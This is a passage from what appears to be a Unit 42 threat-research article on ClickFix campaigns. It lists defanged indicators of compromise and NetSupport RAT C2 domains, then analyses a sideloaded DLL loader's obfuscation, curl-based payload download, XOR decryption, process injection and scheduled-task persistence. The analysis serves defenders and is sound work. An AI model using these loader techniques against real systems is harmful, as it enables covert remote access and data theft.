* loyalcompany\[.\]net
* leocompany\[.\]org
* 80\.77.23\[.\]48
* mhousecreative\[.\]com

### C2 Domains From the NetSupport RAT Example

* mh-sns\[.\]com
* lasix20\[.\]com

## Additional Resources

* [Lampion Is Back With ClickFix Lures](https://unit42.paloaltonetworks.com/lampion-malware-clickfix-lures/) --- Unit 42, Palo Alto Networks
* [New ClickFix activity](https://x.com/Unit42_Intel/status/1924866530195427372) --- Unit 42, Palo Alto Networks
* [From Shadow to Spotlight: The Evolution of Lumma Stealer and Its Hidden Secrets](https://www.cybereason.com/blog/threat-analysis-lummastealer-2.0) --- CyberReason
* [NetSupport RAT Clickfix Distribution](https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution) --- Esentire
* [Lumma Stealer ClickFix Distribution](https://esentire.com/security-advisories/lumma-stealer-clickfix-distribution) --- Esentire
* [DeepSeek ClickFix Scam Exposed!](https://www.cloudsek.com/blog/deepseek-clickfix-scam-exposed-protect-your-data-before-its-too-late?) --- CloudSEK
* [ClearFake: a newcomer to the "fake updates" threats landscape](https://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/) --- Sekoia
* [Havoc: SharePoint with Microsoft Graph API turns into FUD C2](https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2) --- Fortinet

## Appendix: Technical Analysis of the New NetSupport RAT Loader

This section dives into the new DLL-based NetSupport RAT loader, which presents a greater challenge to analysts than previous campaigns. In the past, NetSupport RAT was loaded by [script loaders](https://securelist.com/horns-n-hooves-campaign-delivering-netsupport-rat/114740/) with relatively short infection chains, whereas this loader adds a level of stealth and complexity to the attack.

The example we analyze here is named [msvcp140.dll](https://www.virustotal.com/gui/file/cbaf513e7fd4322b14adcc34b34d793d79076ad310925981548e8d3cff886527). This DLL file is sideloaded by a legitimate executable named [jp2launcher.exe](https://www.virustotal.com/gui/file/1fc684c5adf02b5a96cc407932429f1c2d3d2e78e3104cfbcf535a9de1ee4921).

This DLL uses several techniques to hinder analysis, such as:

* Dynamic API resolving
* Data encryption
* Code obfuscation

For example, after being sideloaded by jp2launcher.exe, the DLL writes the code of its following stages byte-by-byte on the stack. After this, it deobfuscates and executes the code.

After the initial deobfuscation, the DLL retrieves encrypted binaries named data\_3.bin and data\_4.bin from the C2 server via curl.exe and drops the payloads to disk in the same working directory. Figure 13 shows the construction of the curl.exe command to download one of the payloads.
![Screenshot of HTML with syntax highlighting showing various commands and such as mov and push.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/word-image-810756-145728-14.png) Figure 13. Malicious msvcp140.dll loader constructs curl commands to download .bin files shown in x64dbg debugger.

The loader saves both data\_3.bin and data\_4.bin to disk as encrypted binaries, then decrypts them in memory using a rolling XOR key, which is https://google\[.\]com/. The loader then injects the decrypted code into a child process of jp2launcher.exe.

The decrypted code from data\_4.bin is a relatively small shellcode that loads decrypted code from data\_3.bin. This binary is a fully formed PE that downloads the final NetSupport RAT package as a ZIP archive from the attacker's C2 server and unzips it in memory. Figure 14 shows the loader's request to hxxp\[:\]//80.77.23\[.\]48/service/settings/5702b2a25802ff1b520c0d1e388026f8074e836d4e69c10f9481283f886fd9f4. The request contains a unique user agent.
![Screenshot of a computer log detailing HTTP server requests with timestamps and server responses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/word-image-814189-145728-15.png) Figure 14. jp2launcher.exe download request from C2, downloading client32.exe.

The final payload is a ZIP archive that contains NetSupport RAT and all of its required dependencies. The loader drops NetSupport RAT into C:\\ProgramData\\SecurityCheck\_v1\\ and executes its main binary, client32.exe.

The loader then sets up persistence for the RAT by creating a scheduled task that executes client32.exe whenever a user logs in.

In the process of statically analyzing the loader, we noticed a unique PDB path, indicating that this DLL is part of a certain series of MsiShell tools. Pivoting on this path, we found another instance of the campaign. In this case it used legitimate file transfer software, filezilla.exe and sideloaded another version of the loader, libsqlite3-0.dll. Figure 15 shows the similarity between the PDB paths of the two loader versions.
![Two screenshots showing file paths and GUIDs for software projects, both of them being Debug Artifacts. Each item is highlighted in red.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/word-image-817812-145728-16.png) Figure 15. PDB paths of both NetSupport RAT loader versions.

*Updated July 10, 2025, at 8:05 a.m. PT.*
Back to top

### Tags

* [AutoIT](https://unit42.paloaltonetworks.com/tag/autoit/ "AutoIT")
* [ClickFix](https://unit42.paloaltonetworks.com/tag/clickfix/ "ClickFix")
* [Lumma Stealer](https://unit42.paloaltonetworks.com/tag/lumma-stealer/ "Lumma Stealer")
* [Malvertising](https://unit42.paloaltonetworks.com/tag/malvertising/ "malvertising")
* [Remote Access Trojan](https://unit42.paloaltonetworks.com/tag/remote-access-trojan/ "Remote Access Trojan")
* [Social engineering](https://unit42.paloaltonetworks.com/tag/social-engineering/ "social engineering")
* [Typosquatting](https://unit42.paloaltonetworks.com/tag/typosquatting/ "typosquatting")  
  [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research") [Next: GoldMelody's Hidden Chords: Initial Access Broker In-Memory IIS Modules Revealed](https://unit42.paloaltonetworks.com/initial-access-broker-exploits-leaked-machine-keys/ "GoldMelody’s Hidden Chords: Initial Access Broker In-Memory IIS Modules Revealed")

### Table of Contents

* 

### Related Articles

* [Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/ "article - table of contents")
* [Identity Abuse Through Trusted Communication Channels](https://unit42.paloaltonetworks.com/communication-channel-identity-risks/ "article - table of contents")
* [Inside the Modern SOC: The Identity Front Door](https://unit42.paloaltonetworks.com/soc-identity-front-door/ "article - table of contents")

## Related Malware Resources

![Pictorial representation of attackers using AI tools to target Latin American organizations. A vibrant cityscape with silhouettes of numerous people walking along a bustling street. The scene is illuminated by bright urban lights and digital-like particles, creating a dynamic and futuristic atmosphere.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/AdobeStock_768915868-2-1-786x373.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 3, 2026 [#### Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America](https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/)

* [Agentic AI](https://unit42.paloaltonetworks.com/tag/agentic-ai/ "Agentic AI")

* [ChatGPT](https://unit42.paloaltonetworks.com/tag/chatgpt/ "ChatGPT")

* [CL-CRI-1131](https://unit42.paloaltonetworks.com/tag/cl-cri-1131/ "CL-CRI-1131")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/ "Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America")  
  ![Pictorial representation of vishing campaigns in Microsoft Teams. A digital image of a skull formed by blue binary code on a black background, with scattered ones and zeros and digital noise, symbolizes how stealthy prompt injection attacks can exploit AI logic to bypass security controls.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/01_Malware_Category_1920x900-5-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 31, 2026 [#### Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/)

* [Cloaked Ursa](https://unit42.paloaltonetworks.com/tag/cloaked-ursa/ "Cloaked Ursa")

* [Entra ID](https://unit42.paloaltonetworks.com/tag/entra-id/ "Entra ID")

* [Microsoft Teams](https://unit42.paloaltonetworks.com/tag/microsoft-teams/ "Microsoft Teams")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/ "Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams")  
  ![Pictorial representation of AI-enabled malware. A vibrant digital interface displaying various icons and graphs, resembling a futuristic network or data analysis dashboard. The scene is illuminated with glowing lights and patterns.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/AdobeStock_1270203474-2-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 25, 2026 [#### The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution](https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/)

* [Backdoor](https://unit42.paloaltonetworks.com/tag/backdoor/ "backdoor")

* [Bitcoin](https://unit42.paloaltonetworks.com/tag/bitcoin/ "Bitcoin")

* [DLL hijacking](https://unit42.paloaltonetworks.com/tag/dll-hijacking/ "DLL hijacking")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/ "The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution")  
  ![Pictorial representation of identity abuse through trusted communication channels. Close-up view of a digital screen displaying a glitched and pixelated image of a skull-like shape.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/02_Malware_Category_1920x900-2-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 20, 2026 [#### Identity Abuse Through Trusted Communication Channels](https://unit42.paloaltonetworks.com/communication-channel-identity-risks/)

* [Authentication](https://unit42.paloaltonetworks.com/tag/authentication/ "authentication")

* [Identity theft](https://unit42.paloaltonetworks.com/tag/identity-theft/ "identity theft")

* [Malware](https://unit42.paloaltonetworks.com/tag/malware/ "malware")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/communication-channel-identity-risks/ "Identity Abuse Through Trusted Communication Channels")  
  ![Pictorial representation of Kimwolf botnet malware family. Digital screen with a warning sign reading "Malware." The background features lines of computer code and graphics, creating a sense of cybersecurity threat.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/07_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 11, 2026 [#### Kimwolf v7: An Evolution of the Kimwolf Botnet](https://unit42.paloaltonetworks.com/kimwolf-v7-botnet-malware/)

* [Android APK](https://unit42.paloaltonetworks.com/tag/android-apk/ "Android APK")

* [Ethereum](https://unit42.paloaltonetworks.com/tag/ethereum/ "Ethereum")

* [HTTP](https://unit42.paloaltonetworks.com/tag/http/ "HTTP")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/kimwolf-v7-botnet-malware/ "Kimwolf v7: An Evolution of the Kimwolf Botnet")  
  ![Pictorial representatiom pf Aeternum's blockchain C2. A close-up of a computer circuit board with a central microchip is depicted. Red digital data streams in the form of glowing binary numbers and arrows appear to flow in and out of the chip. The scene is illuminated with a futuristic blue and red glow.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/04_Malware_Category_1920x900-4-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 10, 2026 [#### The Permanent Threat: Analyzing Aeternum's Blockchain-Based C2 Operations and Communications](https://unit42.paloaltonetworks.com/aeternum-blockchain-c2-analysis/)

* [Aeternum](https://unit42.paloaltonetworks.com/tag/aeternum/ "Aeternum")

* [Infection chain](https://unit42.paloaltonetworks.com/tag/infection-chain/ "infection chain")

* [JSON](https://unit42.paloaltonetworks.com/tag/json/ "JSON")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/aeternum-blockchain-c2-analysis/ "The Permanent Threat: Analyzing Aeternum’s Blockchain-Based C2 Operations and Communications")  
  ![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)High Profile Threats](https://unit42.paloaltonetworks.com/category/top-cyberthreats/) August 6, 2026 [#### ChainDrop: Inside a Self-Propagating npm Worm](https://unit42.paloaltonetworks.com/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/tag/blockchain/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/tag/claude-code/ "Claude code")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/chaindrop-npm-worm-analysis/ "ChainDrop: Inside a Self-Propagating npm Worm")  
  ![Pictorial representation of Token-jacking. A person types on a laptop with multiple digital interface elements projected, including an "AI" icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/AdobeStock_1246251272-2-786x369.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 6, 2026 [#### Token Jacking: Cybercriminals Could Be Stealing Your AI Resources](https://unit42.paloaltonetworks.com/ai-token-jacking/)

* [AI API](https://unit42.paloaltonetworks.com/tag/ai-api/ "AI API")

* [AI gateway](https://unit42.paloaltonetworks.com/tag/ai-gateway/ "AI gateway")

* [API keys](https://unit42.paloaltonetworks.com/tag/api-keys/ "API keys")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-token-jacking/ "Token Jacking: Cybercriminals Could Be Stealing Your AI Resources")  
  ![Pictorial representation of malware bypassing DNS and communicating directly to IP addresses. Futuristic digital cityscape with glowing blue and orange geometric structures, resembling skyscrapers.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/07_DNS_Overview_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 4, 2026 [#### Almost Half of Malware Samples Communicate Direct to IP](https://unit42.paloaltonetworks.com/malware-bypass-dns-direct-to-ip/)

* [Command and Control](https://unit42.paloaltonetworks.com/tag/command-and-control/ "Command and Control")

* [D2IP](https://unit42.paloaltonetworks.com/tag/d2ip/ "D2IP")

* [Exfiltration](https://unit42.paloaltonetworks.com/tag/exfiltration/ "exfiltration")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/malware-bypass-dns-direct-to-ip/ "Almost Half of Malware Samples Communicate Direct to IP")  
  ![Pictorial representation of passwordless authentication. East Asian woman examining data on multiple screens in a high-tech environment, surrounded by digital graphics and code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/07/07_Cloud_cybersecurity_research_Overview_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 3, 2026 [#### Pass the Passkey: A Novel Attack Surface in Passwordless Authentication](https://unit42.paloaltonetworks.com/passwordless-authentication-security-risks/)

* [Google authenticator](https://unit42.paloaltonetworks.com/tag/google-authenticator/ "google authenticator")

* [Google Chrome](https://unit42.paloaltonetworks.com/tag/google-chrome/ "Google Chrome")

* [Google Cloud](https://unit42.paloaltonetworks.com/tag/google-cloud/ "Google Cloud")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/passwordless-authentication-security-risks/ "Pass the Passkey: A Novel Attack Surface in Passwordless Authentication")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/unit42-footer-subscribe-desktop.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Get updates from Unit 42

## Peace of mind comes from staying ahead of threats. Subscribe today.

Your Email

Subscribe for email updates to all Unit 42 threat research.  
By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use "Terms of Use") and acknowledge our [Privacy Statement.](https://www.paloaltonetworks.com/legal-notices/privacy "Privacy Statement")

This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply.

Invalid captcha!
Subscribe ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} Products and Services

* [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security)

* [Secure AI by Design](https://www.paloaltonetworks.com/ai-security)

* [Prisma AIRS](https://www.paloaltonetworks.com/ai-security/prisma-airs)

* [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security)

* [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security)

* [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.com/network-security/ot-security-solution)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall)

* [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations)

* [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.com/network-security/panorama)

* [Secure Access Service Edge](https://www.paloaltonetworks.com/sase)

* [Prisma SASE](https://www.paloaltonetworks.com/sase)

* [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration)

* [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.com/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan)

* [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex)

* [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud)

* [AI-Driven SOC](https://www.paloaltonetworks.com/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse)

* [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/cortex/managed-detection-and-response)

* [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam)

* [Next-Generation Identity Security](https://www.paloaltonetworks.com/idira)

* [Privileged Access Management](https://www.paloaltonetworks.com/idira/human/privileged-access-management)

* [Identity and Access Management](https://www.paloaltonetworks.com/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.com/idira/human/endpoint-privilege-manager)

* [Identity Governance](https://www.paloaltonetworks.com/idira/human/identity-governance)

* [Workforce Password Management](https://www.paloaltonetworks.com/idira/human/workforce-password-management)

* [Agentic Identities](https://www.paloaltonetworks.com/idira/agentic)

* [Secrets Management](https://www.paloaltonetworks.com/idira/machine/secrets-management)

* [Unified Secrets Governance](https://www.paloaltonetworks.com/idira/machine/unified-secrets-governance)

* [Application Credentials Delivery](https://www.paloaltonetworks.com/idira/machine/application-credentials-delivery)

* [Vendor Privileged Access](https://www.paloaltonetworks.com/idira/human/vendor-privileged-access)

* [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42)

* [Proactive Assessments](https://www.paloaltonetworks.com/unit42/assess)

* [Incident Response](https://www.paloaltonetworks.com/unit42/respond)

* [Transform Your Security Strategy](https://www.paloaltonetworks.com/unit42/transform)

* [Discover Threat Intelligence](https://www.paloaltonetworks.com/unit42/threat-intelligence-partners)  
  Company

* [About Us](https://www.paloaltonetworks.com/about-us)

* [Careers](https://jobs.paloaltonetworks.com/en/)

* [Contact Us](https://www.paloaltonetworks.com/company/contact-sales)

* [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [Customers](https://www.paloaltonetworks.com/customers)

* [Investor Relations](https://investors.paloaltonetworks.com/)

* [Location](https://www.paloaltonetworks.com/about-us/locations)

* [Newsroom](https://www.paloaltonetworks.com/company/newsroom)  
  Popular Links

* [Blog](https://www.paloaltonetworks.com/blog/)

* [Communities](https://www.paloaltonetworks.com/communities)

* [Content Library](https://www.paloaltonetworks.com/resources)

* [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia)

* [Event Center](https://events.paloaltonetworks.com/)

* [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center)

* [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z)

* [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/certifications)

* [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure)

* [Sitemap](https://www.paloaltonetworks.com/sitemap)

* [Tech Docs](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.com/)

* [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy)

* [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center)

* [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use)

* [Documents](https://www.paloaltonetworks.com/legal)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector)
* [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* EN  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
